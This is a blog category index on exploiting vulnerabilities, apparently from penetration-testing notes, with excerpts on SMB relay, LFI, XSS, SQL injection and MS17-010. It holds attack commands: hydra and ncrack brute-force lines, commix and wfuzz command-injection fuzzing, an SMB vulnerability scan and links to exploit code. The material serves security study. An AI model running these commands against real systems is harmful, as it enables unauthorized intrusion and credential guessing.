Category: Category: Exploiting Vulnerabilities
NTLM and SMB Relay Attack
So this post is basically about why it is important to use Kerberos instead of NTLM and use SMB […]
Read More →Local File Inclusion (LFI)
Scripts that takes filenames as parameters without sanitizing the user input is typically good candidates for LFI vulnerabilities. For […]
Read More →Java Signed Applet Attack
Java Signed Applet Attack is a Client Side exploit and is based on a human vulnerability as opposted to […]
Read More →Brute forcing protocols/services
Ncrack ncrack can brute force RDP.
|
1 2 |
ncrack -vv --user user1 -P password-file.txt rdp://$ip |
Hydra Hydra brute force against SNMP
|
1 2 |
hydra -P password-file.txt -v $ip snmp |
Hydra FTP known user and […]
Read More →XSS – Cross Site Scripting
BeeF Framework BeeF is native in Kali and is a browser exploitation framework. From the vulnerable website insert below […]
Read More →Compiling exploits to Windows on Kali
Compile Win32 exploit with Wine install mingw
|
1 2 3 4 |
wget http://downloads.sourceforge.net/project/mingw/Installer/mingw-get-setup.exe wine mingw-get-setup.exe # (select mingw base and c++, menu -> apply changes, quit) |
|
1 2 |
wine regedit # (HKCU/Environment add string PATH c:\windows;c:\windows\system;c:\MinGW\bin) rm mingw-get-setup.exe |
install some libs mingw needs
|
1 2 |
wget http://gojhonny.com/misc/mingw_bin.zipunzip mingw_bin.zip -d /root/.wine/drive_c/windows/ rm mingw_bin.zip |
running
|
1 2 3 4 |
wine mingw32-gcc.exe foo.c -o foo.exe -lws2_32 wine mingw32-g++.exe foo.cpp -o foo.exe -lws2_32 |
Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection. Commix
|
1 2 |
commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3 |
wfuzz
|
1 2 |
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php |
curl […]
Read More →SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection. Below is some […]
Read More →SQL Injection – RCE and LFI Methods
Upload PHP Command Injection Following can be used to get RCE / Command Execution when target is vulnerable to […]
Read More →MS17-010
Resources for MS17-010 Exploit: https://github.com/3ndG4me/AutoBlue-MS17-010 https://github.com/helviojunior/MS17-010 Scan for Vulnerable MS17-010:
|
1 2 |
nmap --script smb-vuln* -p 139,445 10.1.1.22 |
https://github.com/claudioviviani/ms17-010-m4ss-sc4nn3r
Read More →